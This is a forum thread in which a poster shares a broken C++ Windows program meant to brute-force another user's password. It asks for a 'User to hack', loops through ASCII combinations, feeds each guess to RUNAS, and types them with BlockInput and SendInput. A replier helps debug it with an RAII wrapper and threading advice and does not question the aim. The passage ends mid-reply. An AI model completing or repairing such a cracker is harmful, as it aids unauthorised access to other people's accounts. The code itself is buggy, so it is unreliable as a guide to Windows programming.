Hey I had this pretend password spammer program (which just outputted a cycle of many combinations) but after randomly browsing MSDN for a while I wondered if I could make it work for real...
I don't think an awful lot of this is right but it compiles, only to get a runtime error.
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include <string>
#define NAME_SIZE 20
#define PASS_SIZE 20
usingnamespace std;
void CALLBACK sendMessage(string arg);
int main(){
char user[NAME_SIZE];
printf("User to hack: ");
for(int i=0; i<NAME_SIZE; i++){
char temp = getchar();
if(isalnum(temp))
user[i] = temp;
elsebreak;
}
string word;
word.push_back(' '); //To add first field to vector before while loop
short asSet = 32;
short asGet;
short pos; //used to index position of word[]
printf("Trying Combination:\n");
while(word.size() < PASS_SIZE){
pos = 0;
while(asSet < 127){ //To cycle through 1st number
word[0] = (asSet); //Set word[0] to asSet ASCII
LPTHREAD_START_ROUTINE address = (LPTHREAD_START_ROUTINE)sendMessage;
if(CreateThread(NULL, NULL, address, &word, NULL, NULL)){
//Compiler was complaining about how I was putting string together so I gave up and changed it to this
string full = "RUNAS //user:";
full += user;
full += " found.exe "; //Application doesn't exist yet but will take the password as launch argument
full += word;
if(system(full.c_str()))
exit(0);
printf("%s", (word.c_str()));
printf("\r");
asSet++; //increment ASCII code for word[0]
}
}//CLOSE while(temp < 127)
while(asSet != 32){
asGet = (word[pos]); //gets ASCII code for word[pos]
if(asGet == 126){ //if ASCII for word[pos] is maxed
word[pos] = ' '; //reset this to SP (ASCII=32)
if(pos == (word.size() -1)) //if this is last character (i.e last combination)
word.push_back('!'); //add another charater for new combinations
else //if this is NOT last character
pos++; //move to next character for testing
}//CLOSE if(asGet == 126)
else{ //if ASCII for word[pos] is NOT maxed
word[pos] = (asGet +1); //increment it's current ASCII value
asSet = 32; //reset iterater for word[0] to exit loop and re-enter top loop
}//CLOSE else
}//CLOSE while(asSet != 32)
}//CLOSE while(word.size() < PASS_SIZE)
}
void CALLBACK sendMessage(string arg){
BlockInput(TRUE);
INPUT msg[PASS_SIZE];
for(int i=0; i<PASS_SIZE; i++){
msg[i].type = INPUT_KEYBOARD;
KEYBDINPUT key;
key.wVk = arg[i];
key.wScan = NULL;
key.dwFlags = NULL;
key.time = NULL;
key.dwExtraInfo = NULL;
msg[i].ki = key;
}
SendInput(PASS_SIZE, msg, sizeof(INPUT));
BlockInput(FALSE);
}
The runtime error I get is in a big message box from either windows or the IDE saying "Expression: Subscript out of range", however the box only appears for a split second before it, and the application terminate (I quickly used print screen and paint to view the message).
So... How badly does this program kill my computer and how insane am I for trying it?
I may also want to mention that a lot of this doesn't even make sense to myself, I made half the code years ago when I first started programming so it's a bit messed up, secondly I'm not all in the right mind right now as it's 1:45am XD
Wait... I've had a nice long kip and I think I see the error is because I'm sending ascii character values as key values.
I.e. it starts with '!' which as a key value should be '1' with the shift bit (or whatever it is that needs to be active)
So once I've corrected that do you think it'll work?
Also, the BlockInput is kinda risky, you should do a little protection against crashes (even tho Windows should handle it well):
1 2 3 4 5 6 7 8 9 10 11 12
// Outside of any function:
struct SafeBlockInput {
SafeBlockInput() { BlockInput(TRUE); }
~SafeBlockInput() { BlockInput(FALSE); }
};
// Remove all your BlockInput calls into the sendMessage function and:
void CALLBACK sendMessage(string arg){
SafeBlockInput sbi;
// ...
}
This way, whichever way the function quits, even in case of exceptions, SafeBlockInput::~SafeBlockInput will be called, and it will call BlockInput(FALSE); which will unblock input for the user.
Well I think I've changed that since I last posted but I can't be sure without checking, cheers for pointing that out, and yes windows does handle the errors, although I'd say a little badly but none the less.
Just another thing:
You may get some errors, due to CreateThread and asynchronies with your main program flow.
Also you should create a LPTHREAD_START_ROUTINE function without casting it!
To solve this error (At least in this example):